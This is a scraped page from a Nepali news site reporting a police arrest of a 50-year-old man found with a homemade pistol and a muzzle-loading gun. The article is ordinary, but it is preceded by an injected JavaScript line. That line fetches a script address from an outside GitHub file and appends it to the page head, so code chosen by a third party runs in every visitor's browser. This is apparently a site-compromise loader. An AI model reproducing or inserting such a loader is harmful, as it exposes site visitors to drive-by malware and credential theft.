;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ५० वर्षीय छोटेलाल राढलाइ प्रहरीले कटुवा पेस्तोल र भरुवा बन्दुकसहित  पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ५० वर्षीय छोटेलाल राढलाइ प्रहरीले कटुवा पेस्तोल र भरुवा बन्दुकसहित  पक्राउ
Breaking News

५० वर्षीय छोटेलाल राढलाइ प्रहरीले कटुवा पेस्तोल र भरुवा बन्दुकसहित  पक्राउ

जुनेली न्यूज, काठमाण्डौ । नरैनापुर गाउँपालिका-६ दोन्द्रागाँउका ५० वर्षीय छोटेलाल राढलाइ प्रहरीले कटुवा पेस्तोल र भरुवा बन्दुकसहित  पक्राउ गरेको छ ।

उनलाई १ थान कटुवा पेस्तोल, १ थान एकनाले भरुवा बन्दुक र उक्त भरुवा बन्दुकमा लाग्ने ३ थान छर्रासहित लुम्बिनी प्रदेश प्रहरी अनुसन्धान समूह दाङबाट खटिएको प्रहरी टोलीले अनुसन्धानको क्रममा  पक्राउ गरेको हो ।

पक्राउ परेका उनीमाथि प्रहरीले थप अनुसन्धान गरिरहेको जनाएको छ ।

फेसबुक प्रतिक्रियाहरु